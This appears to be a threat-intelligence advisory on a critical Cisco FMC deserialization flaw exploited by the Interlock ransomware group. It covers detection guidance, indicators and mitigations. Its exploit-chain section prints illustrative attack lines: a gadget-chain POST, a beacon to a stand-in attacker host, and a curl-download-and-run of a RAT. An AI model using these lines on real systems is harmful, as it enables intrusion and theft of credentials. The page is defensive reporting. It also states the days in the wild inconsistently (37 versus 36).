TP-EXP-2026-0002 CVE-2026-20131 critical Patched Under Review

Cisco FMC Insecure Deserialization — Interlock Ransomware Zero-Day

CVE CVE-2026-20131 Platform Cisco Secure FMC Type RCE

Severity CRITICAL

Status Patched

Zero-Day Confirmed

Disclosed March 4, 2026

Patched March 4, 2026

Days in the Wild 37

Researcher Amazon Threat Intelligence / MadPot CISA KEV Listed

Severity Assessment

Exploitability: 9.5/10 — Unauthenticated Java deserialization RCE with no credentials required; weaponized by Interlock as a zero-day for 36 days
Impact: 10/10 — Root-level code execution on Cisco FMC appliances; full network visibility and control plane compromise
Weaponization Risk: 9.5/10 — Actively exploited by Interlock ransomware group; CVSS 10.0 CRITICAL; CISA KEV listed
Patch Urgency: 9/10 — CISA mandatory remediation deadline; enterprise firewall management plane exposure requires immediate action
Detection Coverage: 6/10 — Java deserialization patterns detectable via network inspection; memory-resident web shells and ScreenConnect deployments require endpoint-level monitoring

Summary

CVE-2026-20131 is a CVSS 10.0 insecure deserialization vulnerability in Cisco Secure Firewall Management Center (FMC) web management interface. An unauthenticated remote attacker can send crafted serialized Java objects to execute arbitrary Java code as root on the FMC appliance.

The Interlock ransomware group exploited this as a zero-day starting January 26, 2026 — 36 days before public disclosure on March 4, 2026. Amazon’s threat intelligence team discovered the campaign through their MadPot honeypot infrastructure.

Attackers deployed custom remote access trojans (RATs), web shells, ConnectWise ScreenConnect for persistence, and Certify for Active Directory Certificate Services (AD CS) exploitation. This represents one of the most severe enterprise infrastructure vulnerabilities discovered in Q1 2026.

Exploit Chain

Initial Access — Authentication Bypass via Java Deserialization An unauthenticated remote attacker sends crafted HTTP requests to the FMC web management path containing malicious serialized Java objects. These requests bypass authentication mechanisms and reach the vulnerable deserialization handler. POST /admin/pageflows/… HTTP/1.1Host: fmc.target.comContent-Type: application/octet-stream[Serialized Java Object - ysoserial gadget chain]

Code Execution — Java Object Deserialization RCE The FMC application deserializes the malicious Java object without proper validation. This triggers arbitrary code execution through a Java gadget chain (likely leveraging commons-collections or similar vulnerable libraries). Code executes with root privileges within the FMC process context. java.io.ObjectInputStream.readObject() → CommonsCollections gadget chain → Runtime.exec() invoked as root → Arbitrary code execution achieved

Confirmation Beacon — Outbound Callback to C2 Compromised FMC systems issue HTTP PUT requests to attacker-controlled servers to confirm successful exploitation. These requests include system identifiers and allow the attacker to verify compromise and prepare for payload delivery. PUT /check?id=[SYSTEM_ID] HTTP/1.1Host: attacker-c2.com:8080Confirmation of successful RCE

Payload Delivery — Malware Download and Execution Commands are sent to download ELF binaries hosting Interlock’s toolkit including custom RATs, web shells for persistent access, and reconnaissance scripts. Downloaded payloads execute with root privileges on the FMC appliance. curl http://attacker-payload.com/interlock_rat.elfchmod +x interlock_rat.elf./interlock_rat.elf &

Lateral Movement and Persistence — AD CS Exploitation ConnectWise ScreenConnect is deployed on the FMC appliance for persistent remote access. The Volatility Framework is used for memory forensics and credential extraction. Certify tool is executed to discover and exploit misconfigured Active Directory Certificate Services, enabling lateral movement into the domain. ./ScreenConnect.Agent.exe./volatility.py -f /dev/mem -p [plugin]./Certify.exe find

Detection Guidance

Detection Rule Behavioral Indicator Confidence

Java Deserialization Patterns in FMC Monitor for unusual Java deserialization patterns in FMC web management logs. Look for serialized object streams in HTTP requests to management endpoints. HIGH

Malicious Serialized Objects Unexpected serialized Java objects in HTTP requests to FMC management interface. Common gadget chain signatures from ysoserial. HIGH

Outbound C2 Communication HTTP PUT requests from FMC to external IPs on non-standard ports (8080, 8888, etc.). Outbound callbacks from firewall management to unknown infrastructure. HIGH

Unexpected ELF Binary Downloads Unexpected ELF binary downloads and execution on FMC appliances. Non-standard process execution chains on FMC running as root. HIGH

ScreenConnect Installation Unauthorized ConnectWise ScreenConnect installations on FMC systems. ScreenConnect agent processes running on firewall management systems. MED

Memory-Resident Web Shells Memory-resident web shells processing encrypted payloads. Encrypted command channels from management interfaces. MED

Indicators of Compromise

Interlock ransomware toolkit components — custom ELF RATs and reconnaissance scripts on FMC appliances
ConnectWise ScreenConnect unauthorized deployment — ScreenConnect agent processes running on firewall management systems
HAProxy/fail2ban infrastructure configuration scripts — attacker-side infrastructure tooling recovered from C2 servers
Volatility Framework deployment on FMC — memory forensics tooling used for credential extraction post-compromise

Recommended Mitigations:

Patch Immediately — Apply Cisco’s security update for FMC. Highest priority given CVSS 10.0 severity.
Network Segmentation — Ensure FMC management interfaces are not exposed to untrusted networks. Restrict access via ACLs and zero-trust controls.
ScreenConnect Audit — Review all ConnectWise ScreenConnect deployments for unauthorized installations. Cross-reference with approved software inventory.
Memory Forensics — Run memory analysis on FMC appliances to detect memory-resident web shells and credential extraction artifacts.
AD CS Hardening — Audit Active Directory Certificate Services for misconfigurations exploitable via Certify. Implement least-privilege CA permissions and monitor certificate issuance.

Disclosure Timeline

● 2026-01-26 Interlock Zero-Day Exploitation Begins Interlock ransomware group begins exploiting CVE-2026-20131 as a zero-day vulnerability. Crafted HTTP requests targeting unauthenticated FMC management interfaces trigger Java deserialization RCE.

● 2026-03-04 Cisco Public Disclosure and Patch Release Cisco PSIRT publicly discloses CVE-2026-20131 with CVSS 10.0 rating and releases security patch. This occurs 36 days after Interlock began zero-day exploitation.

● 2026-03-17 Amazon Threat Intelligence Analysis Published Amazon AWS Security Blog publishes detailed analysis of the Interlock ransomware campaign, including exploitation techniques, TTPs, and indicators of compromise discovered through MadPot honeypot.

● 2026-03-18 Mass Exploitation Confirmed Multiple security vendors confirm widespread exploitation of CVE-2026-20131. Kaspersky, CrowdStrike, and other threat intelligence providers report active scanning and exploitation campaigns in the wild.

Sources & References

CISA: Known Exploited Vulnerabilities Catalog — CISA, 2026-03-04
National Vulnerability Database: CVE-2026-20131 — National Vulnerability Database, 2026-03-04
Cisco PSIRT: Security Advisory cisco-sa-fmc-rce-deserialization-20131 — Cisco PSIRT, 2026-03-04
Amazon Web Services Security Blog: Interlock Ransomware Campaign Analysis via MadPot — Amazon Web Services Security Blog, 2026-03-17
BleepingComputer: Ransomware Gang Exploits Cisco FMC Zero-Day Since January 2026 — BleepingComputer, 2026-03-04